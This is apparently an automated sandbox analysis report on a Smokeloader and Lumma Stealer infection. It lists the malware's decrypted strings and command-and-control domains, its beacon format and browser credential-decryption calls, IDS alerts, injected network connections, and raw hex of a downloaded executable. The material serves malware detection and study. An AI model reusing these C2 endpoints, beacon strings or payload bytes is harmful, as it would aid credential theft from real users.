Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: holicisticscrarws.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sweetsquarediaslw.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: plaintediousidowsko.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: miniaturefinerninewjs.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: zippyfinickysofwps.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: obsceneclassyjuwks.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: acceptabledcooeprs.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: whispedwoodmoodsksl.shop
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String decryptor: swg5EG--

Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_0041537E CryptUnprotectData,	5_2_0041537E
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCEA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	9_2_6CCEA9A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCE44C0 PK11_PubEncrypt,	9_2_6CCE44C0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCE4440 PK11_PrivDecrypt,	9_2_6CCE4440
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCB4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	9_2_6CCB4420
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	9_2_6CD325B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCCE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	9_2_6CCCE6E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCEA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	9_2_6CCEA650
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCC8670 PK11_ExportEncryptedPrivKeyInfo,	9_2_6CCC8670
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD0A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	9_2_6CD0A730
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD10180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	9_2_6CD10180
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCE43B0 PK11_PubEncryptPKCS1,PR_SetError,	9_2_6CCE43B0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\A247.exe

Unpacked PE file: 5.2.A247.exe.400000.0.unpack

Source: 3.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\3.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.67.133.187:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49738 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source:	Binary string: nss3.pdb@ source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source:	Binary string: nss3.pdb source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
Source:	Binary string: mozglue.pdb source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.9.dr

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000910h]	5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	5_2_00427353
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_004168EF
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	5_2_00409960
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	5_2_00409960
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	5_2_00404970
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	5_2_00415FE1
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then dec edx	5_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	5_2_00417062
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	5_2_00417062
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	5_2_00426174
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esp+54h]	5_2_004381BB
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	5_2_00426271
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	5_2_00426284
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	5_2_004102B2
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	5_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, 00008000h	5_2_00403570
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then cmp cl, 0000002Eh	5_2_00421580
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	5_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	5_2_00414660
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edi, ebx	5_2_00436670
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	5_2_00431680
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000C0h]	5_2_004106B1
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov dword ptr [esp+000005F0h], 00000000h	5_2_004138D2
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	5_2_004248E0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	5_2_00423931
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	5_2_00423AD0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then jmp edx	5_2_00422AFB
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esp+4Ch]	5_2_00415AFA
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	5_2_0040CB10
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	5_2_0040FBB4
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then jmp edx	5_2_0041CCD0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	5_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	5_2_00423C97
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	5_2_00433D0A
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	5_2_00438F15
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then jmp edx	5_2_0062D097
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	5_2_0064917C
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	5_2_00626248
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then cmp cl, 0000002Eh	5_2_006312E0
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	5_2_006272C9
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	5_2_006272C9
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then dec edx	5_2_0064B2B7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	5_2_006363DB
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	5_2_006364EB
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	5_2_006364D8
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	5_2_00620519
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000910h]	5_2_006375BA
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	5_2_006375BA
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	5_2_00626739
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, 00008000h	5_2_006137D7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	5_2_00612807
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	5_2_006418E7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then cmp byte ptr [ebp+00h], 00000000h	5_2_006248C7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edi, ebx	5_2_006468D7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000C0h]	5_2_00620918
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	5_2_00634B47
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_00626B56
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	5_2_00619BC7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	5_2_00619BC7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	5_2_00634B47
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	5_2_00614BD7
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esi+30h]	5_2_00633B98
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esp+000000A0h]	5_2_00631C89
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esp+4Ch]	5_2_00625D61
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	5_2_0061CD77
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then jmp edx	5_2_00632D5B
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]	5_2_00643E13
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov eax, dword ptr [esp+000001E0h]	5_2_0061FE1B
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	5_2_00633EFE
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+10h]	5_2_00633ECF
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	5_2_00635F55
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 4x nop then jmp dword ptr [004421CCh]	5_2_0062CF1A

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49711 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.5:63577 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49720 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49722 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49731 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49732 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49734 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49772 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49773 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49774 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49775 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49776 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49777 -> 190.187.52.42:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49778 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49779 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49780 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49781 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49782 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49783 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49784 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49785 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49786 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49787 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49788 -> 88.225.215.104:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49789 -> 88.225.215.104:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 190.187.52.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 88.225.215.104 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: holicisticscrarws.shop
Source: Malware configuration extractor	URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor	URLs: plaintediousidowsko.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor	URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor	URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor	URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor	URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor	URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor	URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://lobulraualov.in.net/tmp/index.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 08:30:27 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 08:30:02 GMTConnection: keep-aliveETag: "6652f30a-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
